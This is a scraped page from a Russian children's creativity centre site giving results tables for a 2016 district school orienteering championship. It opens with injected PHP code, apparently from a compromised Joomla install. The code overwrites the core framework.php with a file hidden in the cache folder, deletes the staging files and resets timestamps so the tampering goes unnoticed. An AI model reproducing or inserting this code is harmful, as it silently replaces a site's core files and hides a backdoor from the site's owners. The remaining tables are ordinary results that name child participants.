$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Итоги Открытого чемпионата по спортивному ориентированию
МАУДО "Дом детского творчества п. Новосергиевка" Новосергиевского района Оренбургской области

Регистрация Вход

Зарегистрируйтесь, чтобы иметь возможность оставлять комментарии и скачивать фотографии из нашей "ФОТОГАЛЕРЕИ".



Спасибо за регистрацию.

План мероприятий

Сентябрь 2017
Пн Вт Ср Чт Пт Сб Вс
28 29 30 31 1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 1
Developed by JoomVision.com
Баннер

Итоги Открытого чемпионата по спортивному ориентированию PDF Печать E-mail

    11 июня 2016г. в районе ул. Оренбургской прошел открытый чемпионат Новосергиевского района по спортивному ориентированию среди школьников, в котором приняли участие 5 команд школ района. Среди них были:

Землянская, Кулагинская, Краснополянская, Платовская школы и Новосергиевская СОШ №3. Соревнования проводились по 7 группам: М10,12,14; Ж10,12,14 и МЖ17. По итогам соревнований места распределились следующим образом:

 

Сводный протокол открытого чемпионата Новосергиевского района по спортивному ориентированию

 

среди мальчиков 10 лет и младше:

 

п\п

Фамилия, имя

Школа

Чистое

время

Количество

КП

Количество найденных КП

Занятое

место

1

Бородин Леонид

Землянка

27:25

9

9

1

2

Коваль Егор

Землянка

46:36

9

9

2

3

Шумаев Денис

Землянка

51:29

9

9

3


 

среди девочек 11-12 лет:

 

п\п

Фамилия, имя

Школа

Чистое

время

Количество

       КП

Количество найденных КП

Занятое

место

1

Семёнова Александра

Землянка

01:57:50

11

9

Снята

2

Яновская Надежда

Землянка

02:03:50

11

9

Снята

 

 

среди мальчиков 11-12 лет:

 

п\п

Фамилия, имя

Школа

Чистое

время

Количество

КП

Количество найденных

КП

Занятое

место

1

Жданов Евгений

Землянка

21:45

12

12

1

2

Акашев Константин

Землянка

32:31

12

12

2

3

Жаналин Арслан

Кр. Поляна

39:57

12

12

3

4

Пятин Александр

Кулагино

40:57

12

12

4

5

Семёнов Ярослав

Кр. Поляна

42:11

12

12

5

6

Болтоносов Сергей

Землянка

45:25

12

12

6

7

Рассохин Сергей

НСОШ№3

56:55

12

12

7

8

Никитин Данила

Кулагино

01:31:02

12

12

8


 

среди девушек 13-14 лет:

 

п\п

Фамилия, имя

Школа

Чистое

время

Количество

       КП

Количество найденных

КП

Занятое

место

1

Пятина Елена

Кулагино

49:29

14

14

1

2

Аллагулова Зоя

Кр. Поляна

49:31

14

14

2

3

Акашева Евгения

Землянка

50:28

14

14

3

4

Кабанова Анастасия

Платовка

53:22

14

14

4

5

Шумакова Кристина

Кулагино

56:30

14

14

5

6

Жармухамбетова Диана

Кр. Поляна

01:06:05

14

14

6

7

Некрасова Екатерина

Землянка

01:10:05

14

14

7

8

Яновская Ирина

Землянка

01:14:00

14

14

8

9

Кантемирова Елизавета

Кр. Поляна

01:15:19

14

13

Снята

10

Соломенцева Алёна

Кр. Поляна

51:30

14

11

Снята

 

 

среди девушек 15-17 лет:

 

п\п

Фамилия, имя

Школа

Чистое

время

Количество

       КП

Количество найденных

КП

Занятое

место

1

Углицкая Анастасия

Платовка

51:20

16

16

1

2

Радаева Екатерина

Платовка

01:10:02

16

16

2

3

Илюкина Юлия

Кулагино

01:12:14

16

16

3

4

Семёнова Дарья

Землянка

56:55

16

15

Снята


 

среди юношей 15-17 лет:

 

п\п

Фамилия, имя

Школа

Чистое

время

Количество

       КП

Количество найденных

КП

Занятое

место

1

Кузмин Рамиль

Кулагино

46:58

16

16

1

2

Шипилов Сергей

Кулагино

56:00

16

16

2

3

Горюнов Дмитрий

Кр. Поляна

01:04:53

16

16

3

4

Зоиров Амир

Кр. Поляна

01:08:52

16

16

4

5

Бородин Олег

Землянка

01:11:04

16

16

5

6

Глушко Денис

Кулагино

01:29:06

16

16

6

7

Назаров Данил

Платовка

59:00

16

15

Снят

8

Капишников Даниил

Кулагино

01:22:15

16

15

Снят

9

Бельков Валерий

Кр. Поляна

01:02:06

16

11

Снят

 

 

4

 

3

 

8

 

10

 

Назад

Обновлено 18.06.2016 14:36